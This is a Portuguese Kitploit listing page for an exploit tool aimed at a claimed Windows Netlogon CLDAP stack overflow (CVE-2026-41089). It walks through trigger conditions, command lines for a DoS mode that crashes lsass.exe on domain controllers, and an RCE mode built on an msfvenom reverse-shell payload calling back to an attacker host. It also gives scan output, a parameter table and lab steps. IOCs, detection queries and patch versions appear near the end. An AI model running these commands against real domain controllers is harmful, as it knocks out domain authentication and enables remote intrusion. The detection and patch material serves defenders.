Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41089 — CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。 | Kitploit
Ferramentas/GitHubGitHub/hnytgl/cve-2026-41089
Vulnerability AnalysisExploitationPenetration TestingRemote Access ToolBinary Exploitation
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。

Ver Repositório
1412há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41089 — Exploração de Estouro de Buffer de Pilha CLDAP do Windows Netlogon RCE

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Crítico)
CWE: CWE-121 (Estouro de Buffer Baseado em Pilha)
Vetor de Ataque: UDP/389 (CLDAP SearchRequest)
Impacto: Execução Remota de Código (RCE) / Negação de Serviço (DoS)
Versões Afetadas: Windows Server 2012 R2 ~ 2025 (Controladores de Domínio)
Patch: Atualização Cumulativa de Maio de 2026

Visão Geral da Vulnerabilidade

A função NetpLogonPutUnicodeString em netlogon.dll possui uma vulnerabilidade de estouro de buffer de pilha ao processar solicitações de pesquisa CLDAP. A função recebe um orçamento de comprimento em bytes, mas o interpreta como uma contagem de WCHAR, resultando em uma gravação de 2 vezes o esperado.

O estouro ocorre em um buffer de pilha fixo de 528 bytes (264 ushort) na função NlGetLocalPingResponse. O campo User controlado pelo atacante, junto com o nome de domínio DNS do próprio servidor, preenchem este buffer, eventualmente sobrescrevendo o GS Security Cookie, resultando em __report_gsfailure e falha do lsass.exe.

Condições de Gatilho

  • NtVer=0x02 na Solicitação de Pesquisa CLDAP (força o uso do caminho antigo e vulnerável BuildSamLogonResponse)
  • Comprimento do campo User ≥ ~130 caracteres (limite binário de aproximadamente 260 bytes UTF-16)
  • Comprimento do nome de domínio DNS do servidor ≥ ~80 caracteres (quanto mais longo o domínio, mais fácil atingir o Cookie)

Nota: NtVer=0x16 (valor usado por muitos scripts de detecção públicos) aciona o caminho seguro BuildSamLogonResponseEx e não desencadeia a vulnerabilidade.

Funcionalidades

ModoDescrição

Modo DoS

Um único pacote pode travar lsass.exe, fazendo com que o controlador de domínio reinicie em cerca de 30-60 segundos. Durante este período, toda a autenticação de domínio neste DC falhará.

root@kitploit:~
# Basic usage — send 3 packets
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Single packet quick attack
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Aggressive mode — 5 packets concurrently
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Modo RCE

⚠️ Nível de pesquisa — Não confiável e instável em ambientes reais.

O RCE enfrenta os seguintes desafios:

  1. Os dados de estouro são o nome DNS do próprio servidor, não o shellcode do atacante
  2. O GS Cookie deve ser contornado (requer primitiva de vazamento de informações ou força bruta)
  3. CET/ACG/CFG no Server 2022+ tornam o ROP tradicional mais difícil
root@kitploit:~
# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Send RCE chain
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Modo de Escaneamento

root@kitploit:~
# Fingerprint the target DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Exemplo de saída esperada (alvo corrigido):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Exemplo de saída esperada (alvo não corrigido):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Se NtVer=0x02 expirar enquanto outras versões respondem normalmente, o alvo provavelmente está vulnerável.

Parâmetros Avançados

Configuração do Ambiente de Teste

root@kitploit:~
# 在 Windows Server(未修补)上创建长域名 DC:
# 1. 提升为域控 (DNS 域名很长的域名,例如 "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. 确认已安装 2026 年 5 月之前的补丁
# 3. 从攻击机运行:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. 观察 DC 崩溃和重启

Indicadores de Comprometimento (IOCs)

Rede

  • Solicitação de Pesquisa CLDAP com User > 100 bytes e NtVer = 0x02 na porta UDP/389
  • Tráfego CLDAP anômalo de hosts que não são controladores de domínio para o DC

Host

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Regras de Detecção

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Informações do Patch

Aviso Legal

Esta ferramenta destina-se apenas a avaliações de segurança autorizadas, testes de penetração, competições CTF e pesquisa defensiva. O uso desta ferramenta em qualquer sistema sem autorização por escrito explícita é ilegal. O usuário assume toda a responsabilidade legal.

Links de Referência

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Baixar ferramenta
--mode dos
Envia pacotes CLDAP cuidadosamente construídos, causando falha do LSASS, reinicialização do DC (~60 segundos de interrupção de autenticação)
--mode rceTenta execução remota de código (nível de pesquisa, requer shellcode)
--mode scanEscaneia respostas para diferentes valores de NtVer, identifica a impressão digital do DC alvo
--mode autoDetecta automaticamente e seleciona a melhor estratégia de ataque
ParâmetroDescriçãoValor Padrão
-l, --user-lenComprimento do campo de nome de usuário (número de caracteres ASCII)180
--ntverValor NtVer (hexadecimal, ex. 0x02)0x02
--countNúmero de pacotes DoS a enviar3
--delayAtraso entre pacotes (segundos)0.5
-t, --timeoutTimeout do socket (segundos)5.0
--jsonSaída em formato JSON—
--rawImprimir o pacote bruto em hexadecimal antes de enviar—
--quietSuprimir saída de banner—
--shellcode-fileArquivo de shellcode personalizado (x64 raw)—
--lhostEndereço de escuta do reverse shell—
--lportPorta de escuta do reverse shell4444
Versão do Windows ServerNúmero da Versão do PatchObservações
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772